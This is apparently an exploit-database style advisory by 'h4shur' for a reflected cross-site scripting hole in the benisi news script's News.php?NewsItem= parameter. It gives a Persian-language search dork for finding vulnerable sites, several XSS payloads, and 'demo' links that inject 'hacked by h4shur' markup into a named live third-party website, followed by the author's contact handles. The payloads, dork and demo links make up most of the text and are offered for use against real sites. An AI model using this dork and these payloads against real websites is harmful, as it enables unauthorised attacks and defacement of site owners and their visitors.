[+] Title: benisi Cross Site Scripting (XSS) [+] date: 2020-11-09 [+] Author: h4shur [+] Vendor Homepage: http://benisi.ir/ [+] Tested on: Windows 10 & Google Chrome [+] Vulnerable File: /News.php?NewsItem= [+] Vulnerable Parameter: Get Method [+] Dork: intext:"تمام حقوق اين وبگاه، ویژه شرکت رسانه‌گستر بِنیسی است" intext:"تمام حقوق اين وبگاه، ویژه شرکت رسانه گستر بِنیسی است" intext:"تمام حقوق اين وبگاه، ویژه شرکت رسانه‌گستر بِنیسی است" inurl:/news.php?newsitem= ### POC: [+} site.com/[folder]/News.php?NewsItem= ### Xss Alert Code: "><svg onload=alert()> '><script>alert('');</script> <IMG "'"><script>alert()</script>'> And Etc. ### Demo: [+] http://www.safarejanjali.ir/News.php?NewsItem=380%22%3E%3Cmarquee%3E%3Ch1%3Ehacked%20by%20h4shur%3C/h1%3E%3Cbr%20/%3E%3C/marquee%3E [+] http://www.safarejanjali.ir/News.php?NewsItem=378%22%3E%3Cmarquee%3E%3Ch1%3Ehacked%20by%20h4shur%3C/h1%3E%3Cbr%20/%3E%3C/marquee%3E ### Contact Me : * Email : h4shursec@gmail.com * twitter : @h4shur * Telegram : @h4shur * Instagram : @netedit0r